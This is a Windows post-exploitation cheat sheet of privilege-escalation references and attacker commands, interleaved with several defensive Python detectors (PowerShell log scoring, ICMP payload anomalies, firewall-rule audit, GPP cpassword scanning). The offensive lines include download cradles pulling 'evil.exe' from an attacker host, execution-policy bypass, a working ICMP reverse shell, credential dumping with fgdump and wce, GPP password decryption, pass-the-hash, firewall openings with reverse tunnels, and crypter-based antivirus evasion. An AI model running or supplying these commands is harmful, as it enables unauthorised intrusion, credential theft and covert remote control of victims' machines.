_"Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access."_
— Indiana University (Best practices for computer security)
This is the phase I like to refer to as second-pass enumeration, or enumeration from the inside. Now that we've gained a foothold in the network, it is crucial to run all of our enumeration from the ground up again, this time as an inside actor.
Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks: AT is the new Black - YouTube
Analyzing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Kali> python pyinstaller.py --onefile file.py
Kali> cp /usr/share/windows-binaries/nc.exe .
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Exploitation Techniques and Mitigations on Windows
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
Compromise as a Service: our pleAZURE
Resources
Attacking ADFS Endpoints with PowerShell
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
C:\> Get-Item /path/to/file.zip -Stream *
C:\> Get-ACL C:\path\to\file\or\directory
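The download cradles and execution-policy switches above leave a clear trail in Security 4688 events (process creation, with command-line auditing enabled) and PowerShell Operational 4104 events (script block logging). The following is an added example and not part of the original notes: a small Python scorer run over constructed sample events that mirror the commands above (made-up lines, not real telemetry). The indicator regexes, weights and alert threshold are my own assumptions; tune them to your own baseline.

```python
import re

# Constructed sample events (not real telemetry). Each line is
# "<EventID>\t<Field>=<value>", the flattened form a log shipper might emit
# for Security 4688 (process creation with command line auditing enabled)
# and PowerShell Operational 4104 (script block logging).
SAMPLE_EVENTS = [
    "4688\tCommandLine=cmd.exe /c dir",
    "4688\tCommandLine=powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')\"",
    "4688\tCommandLine=powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    "4688\tCommandLine=powershell -exec bypass -windowstyle hidden -nop -file c:\\path\\to\\file.ps1",
    "4104\tScriptBlockText=$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile($url,$file)",
    "4104\tScriptBlockText=Get-ChildItem C:\\Users | Measure-Object",
]

# Indicator name -> (regex, weight). Short switch forms are covered because
# powershell.exe accepts any unambiguous prefix (-ep, -exec, -w, -nop, ...).
INDICATORS = {
    "exec_policy_bypass": (re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass", re.I), 2),
    "hidden_window":      (re.compile(r"-w(in(dowstyle)?)?\s+hidden", re.I), 2),
    "no_profile":         (re.compile(r"-nop(rofile)?\b", re.I), 1),
    "webclient":          (re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I), 2),
    "download_method":    (re.compile(r"\.Download(String|File|Data)\s*\(", re.I), 1),
    "invoke_expression":  (re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 2),
}
ALERT_THRESHOLD = 3  # a cradle alone, or bypass+hidden, crosses it; a lone -nop does not


def parse_event(line):
    """Split one flattened event line into a dict with event_id and its fields."""
    event_id, *fields = line.rstrip("\n").split("\t")
    record = {"event_id": event_id}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record


def analyze_event(line):
    """Return the event id, the indicators that matched and their summed weight."""
    record = parse_event(line)
    # 4688 carries CommandLine; 4104 carries ScriptBlockText. Check whatever is present.
    text = " ".join(record.get(k, "") for k in ("CommandLine", "ScriptBlockText"))
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {"event_id": record["event_id"], "indicators": hits, "score": score}


def scan(events, threshold=ALERT_THRESHOLD):
    """Return the analyses whose score reaches the threshold, in input order."""
    return [a for a in (analyze_event(e) for e in events) if a["score"] >= threshold]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["event_id"], finding["score"], ", ".join(finding["indicators"]))
```

Run as-is it flags the three powershell.exe launches and the 4104 block that builds a WebClient, and leaves `cmd.exe /c dir` and the Get-ChildItem block alone. The weighting keeps a single `-NoProfile` from alerting on its own while a WebClient cradle always does; that is the same trade-off you make when turning the cheat-sheet commands into a SIEM rule.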
# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command "$client = New-Object System.Net.Sockets.TcpClient;$client.Connect('10.10.14.42', 8000);[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes('pie');$stream = $client.GetStream();$stream.Write($packet, 0, $packet.Length);$stream.Close();$client.Close();"
# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command "$client = New-Object System.Net.Sockets.UdpClient;$client.Connect('10.10.14.42', 8000);[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes('pie');$client.Send($packet, $packet.Length);$client.Close();"
# ICMP
# Ping test (run from cmd.exe: the command text is double-quoted, with single quotes inside)
C:\> powershell -Command "$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes('pie');$client.Send('10.10.14.42', 500, $packet, $options);"
# ICMP shell: stop the Kali kernel from answering echo requests itself, then start the icmpsh master
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
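The ICMP shell above works because most networks let echo requests out and nobody looks at what is inside them. Stock ping clients, however, fill the data field with a fixed pattern, so anything else (a three-byte "pie", an empty polling beacon, or command output) stands out. The following is an added example, not part of the original notes: a Python classifier for echo-request payloads plus a per-flow summary, run over constructed sample records (not a real capture). The Windows pattern and the iputils offset-pattern layout are how I know those clients behave; the anomaly thresholds are my own assumptions.

```python
import string

# Payloads that stock ping clients put into echo requests. The Windows ping
# pattern is a fixed 32-byte string; iputils ping on 64-bit Linux sends 56 bytes
# whose first 16 bytes hold a timestamp and whose remaining bytes equal their offset.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_LEN, LINUX_TIMESTAMP_LEN = 56, 16
PRINTABLE = set(string.printable.encode())


def classify(payload):
    """Label one echo-request payload and explain why it is considered anomalous."""
    if payload == WINDOWS_PING_PAYLOAD:
        return "windows-ping", []
    if (len(payload) == LINUX_PING_LEN
            and all(payload[i] == i for i in range(LINUX_TIMESTAMP_LEN, LINUX_PING_LEN))):
        return "linux-ping", []
    reasons = []
    if len(payload) == 0:
        reasons.append("empty payload (polling beacon)")
    elif len(payload) not in (32, 56):
        reasons.append(f"non-standard length {len(payload)}")
    if payload and all(b in PRINTABLE for b in payload):
        reasons.append("payload is printable text")
    if not reasons:
        reasons.append("standard length but unknown pattern")
    return "anomalous", reasons


def summarize(records):
    """Count labels per (src, dst) pair and keep the anomaly reasons seen.

    records: iterable of (src, dst, payload_bytes), one echo request each.
    """
    flows = {}
    for src, dst, payload in records:
        label, reasons = classify(payload)
        entry = flows.setdefault((src, dst), {"total": 0, "anomalous": 0, "reasons": set()})
        entry["total"] += 1
        if label == "anomalous":
            entry["anomalous"] += 1
            entry["reasons"].update(reasons)
    return flows


def suspicious_flows(records, min_anomalous=3):
    """(src, dst) pairs whose anomalous echo-request count reaches min_anomalous."""
    return sorted(k for k, v in summarize(records).items() if v["anomalous"] >= min_anomalous)


# Constructed sample traffic (not a real capture): two ordinary pings and
# three echo requests shaped like the PowerShell-over-ICMP exchange above.
SAMPLE_RECORDS = [
    ("10.0.0.5", "8.8.8.8", WINDOWS_PING_PAYLOAD),
    ("10.0.0.7", "1.1.1.1", bytes(LINUX_TIMESTAMP_LEN) + bytes(range(LINUX_TIMESTAMP_LEN, LINUX_PING_LEN))),
    ("10.0.0.9", "10.10.14.42", b"pie"),
    ("10.0.0.9", "10.10.14.42", b""),
    ("10.0.0.9", "10.10.14.42", b" Directory of C:\\Users\\victim\r\n\r\n10/10/2020  09:41 AM    <DIR>          Documents\r\n"),
]

if __name__ == "__main__":
    for flow, stats in summarize(SAMPLE_RECORDS).items():
        print(flow, stats["total"], stats["anomalous"], sorted(stats["reasons"]))
    print("suspicious:", suspicious_flows(SAMPLE_RECORDS))
```

The per-flow count matters more than any single packet: one odd ping is noise, but a host that keeps sending empty and text-bearing echo requests to the same peer is the polling loop from the one-liner above. Feeding this the decoded ICMP data field from a sensor (Zeek or tcpdump output) is left to the reader.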
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
5 Ways to find Systems running domain admin processes
PenTesting Active Directory Environments: CrackMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domain's worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
[Kerberos Golden Ticket Protection](https://cert.europa.eu/static/WhitePapers/UPDATED - CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf)
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
C:\> wce -w
You need to be an admin already: it copies an executable to an admin share, registers it as a service and starts it.
Lateral Movement with Invoke-PsExec
Anatomy of UAC Attacks - FuzzySecurity
Elevating privileges by exploiting weak folder permissions
C:\> icacls example.exe
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy <path\to\Groups.xml> C:\temp\
Kali> gpp-decrypt <cpassword-value>
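The Groups.xml hunt above works because Group Policy Preferences stored account passwords as a cpassword attribute in SYSVOL, which every domain user can read (MS14-025). The defensive counterpart is to find and remove every such entry yourself. The following is an added example, not part of the original notes: a Python scanner that reports cpassword entries across the preference file types that can carry one, run here over constructed sample files (the clsid, uid and cpassword values are placeholders; only the element and attribute layout follows the GPP format). It deliberately never decrypts anything. The mapping of file type to account attribute is my own assumption about the format.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files under SYSVOL that can carry a cpassword attribute, and the
# attribute naming the account in each. The element holding cpassword is
# <Properties>; the item metadata (name, changed) sits on its parent element.
GPP_FILES = {
    "Groups.xml": "userName",
    "Services.xml": "accountName",
    "ScheduledTasks.xml": "runAs",
    "DataSources.xml": "username",
    "Drives.xml": "userName",
    "Printers.xml": "username",
}


def find_cpasswords(xml_text, file_name):
    """Return one finding per element that stores a non-empty cpassword.

    The encrypted value itself is deliberately not returned: the point is to
    locate and remove such entries, not to recover the password.
    """
    account_attr = GPP_FILES.get(file_name, "userName")
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if not elem.get("cpassword"):   # absent or "" means nothing is stored
            continue
        item = parent_of.get(elem, elem)  # e.g. <User name=... changed=...> around <Properties>
        findings.append({
            "file": file_name,
            "item": item.get("name", item.tag),
            "account": elem.get(account_attr, "?"),
            "action": elem.get("action", "?"),
            "changed": item.get("changed", "?"),
        })
    return findings


def scan_sysvol(sysvol_root):
    """Walk a mounted SYSVOL copy (e.g. the Z: drive above) and report every stored cpassword."""
    findings = []
    for name in GPP_FILES:
        for path in Path(sysvol_root).rglob(name):
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), name))
    return findings


# Constructed samples (not real policy files).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="LocalAdmin" changed="2014-05-01 10:00:00" uid="{UID-PLACEHOLDER}">
    <Properties action="U" newName="" fullName="" description="" cpassword="CPASSWORD-PLACEHOLDER"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
  <User clsid="{CLSID-PLACEHOLDER}" name="Guest" changed="2014-05-01 10:05:00" uid="{UID-PLACEHOLDER}">
    <Properties action="U" newName="" fullName="" description="" cpassword="" acctDisabled="1" userName="Guest"/>
  </User>
</Groups>
"""
SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{CLSID-PLACEHOLDER}">
  <NTService clsid="{CLSID-PLACEHOLDER}" name="BackupAgent" changed="2015-02-03 08:00:00" uid="{UID-PLACEHOLDER}">
    <Properties startupType="AUTOMATIC" serviceName="BackupAgent" serviceAction="START"
                accountName="CORP\\svc_backup" cpassword="CPASSWORD-PLACEHOLDER"/>
  </NTService>
</NTServices>
"""

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml") + find_cpasswords(SAMPLE_SERVICES_XML, "Services.xml"):
        print(f)
```

`scan_sysvol(r"Z:\")` (or a Linux mount point) runs the same check over a real SYSVOL copy. The `changed` timestamp is worth keeping in the report: it tells you how long the password has been readable by every domain member, and therefore that rotating the account is part of the fix, not just deleting the preference item.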
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe
# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000
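Each netsh rule above is a durable change to the host that survives the session, which makes the firewall rule set one of the cheapest places to catch this kind of persistence. The following is an added example, not part of the original notes: a Python parser for the output of `netsh advfirewall firewall show rule name=all` plus an audit that flags enabled inbound allow rules opening unexpected ports or programs outside trusted directories. The sample text is constructed (abridged to the properties the audit uses) in the "Key: value" shape netsh prints; the expected-port set and trusted-directory list are my own assumptions for the example.

```python
# Constructed sample (abridged, not real netsh output) in the shape
# "netsh advfirewall firewall show rule name=all" prints: one "Key: value"
# line per property, with a dashed line after each rule name.
SAMPLE_NETSH_OUTPUT = """
Rule Name:                            Remote Desktop - User Mode (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Action:                               Allow

Rule Name:                            httptunnel_client
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             Any
Program:                              C:\\Users\\Public\\httptunnel_client.exe
Action:                               Allow

Rule Name:                            3000
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            3000
RemotePort:                           Any
Action:                               Allow
"""

# Assumed trusted locations for rule-bound programs (compared case-insensitively).
TRUSTED_PROGRAM_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_rules(text):
    """Split netsh output into one dict per rule (keys as printed, values stripped)."""
    rules, current = [], None
    for line in text.splitlines():
        if not line.strip() or line.startswith("-"):
            continue
        key, sep, value = line.partition(":")  # first colon only: paths keep their "C:"
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Rule Name":
            current = {"Rule Name": value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def audit(rules, expected_ports):
    """Flag enabled inbound allow rules that open unexpected ports or untrusted programs."""
    findings = []
    for rule in rules:
        if (rule.get("Enabled") != "Yes" or rule.get("Direction") != "In"
                or rule.get("Action") != "Allow"):
            continue
        reasons = []
        port = rule.get("LocalPort", "Any")
        program = rule.get("Program", "")
        if port == "Any" and not program:
            reasons.append("inbound allow on any port without a program restriction")
        elif port != "Any" and port not in expected_ports:
            reasons.append(f"unexpected local port {port}")
        if program and not program.lower().startswith(TRUSTED_PROGRAM_PREFIXES):
            reasons.append(f"program outside trusted directories: {program}")
        if reasons:
            findings.append({"rule": rule["Rule Name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(parse_rules(SAMPLE_NETSH_OUTPUT), {"3389"}):
        print(finding["rule"], "->", "; ".join(finding["reasons"]))
```

Against the sample the RDP rule passes (3389 is expected), the outbound DNS rule is ignored, and the two rules that mirror the cheat-sheet commands are reported. Running this against a known-good export from the same image, or diffing two exports, is the practical way to use it; a rule named after a port number with no group is itself a hint that it was added by hand.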
# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> unzip Hyperion-1.0.zip && cd Hyperion-1.0
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe